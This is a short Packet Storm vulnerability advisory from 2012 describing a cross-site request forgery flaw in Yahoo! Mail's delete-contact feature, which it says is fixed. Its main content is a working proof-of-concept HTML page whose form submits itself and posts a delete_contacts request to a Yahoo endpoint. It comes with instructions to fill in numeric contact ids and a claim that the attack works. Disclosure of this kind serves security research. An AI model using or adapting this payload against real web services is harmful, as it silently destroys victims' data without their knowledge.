Yahoo! Mail suffered from a delete contact cross site request forgery vulnerability. This has been fixed.
fe436fbee0c4590ef8973557374f77ac =======================================================================
YAHOOMAIL CSRF Vulnerability
=======================================================================
# Vulnerability found in- Yahoomail Delete Contact module
# email prakhar.agrawal26@gmail.com
# company AKS IT Services Pvt. Ltd
# Credit by Prakar Agrawal
# Email Service Yahoomail
# Category Mail service
# Site p4ge http://www.yahoomail.com
# Plateform java
# Proof of concept #
Targeted URL: http://address.mail.yahoo.com/
Script to Delete the contacts from contact list through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
<input type=hidden name="action" value="delete_contacts">
<input type=hidden name="id" value="$Numeric No.$">
</form>
<script>document.csrf.submit();</script>
</body>
</html>
. ..................................................................................................................
Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working.....
# If you have any questions, comments, or concerns, feel free to contact me.
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!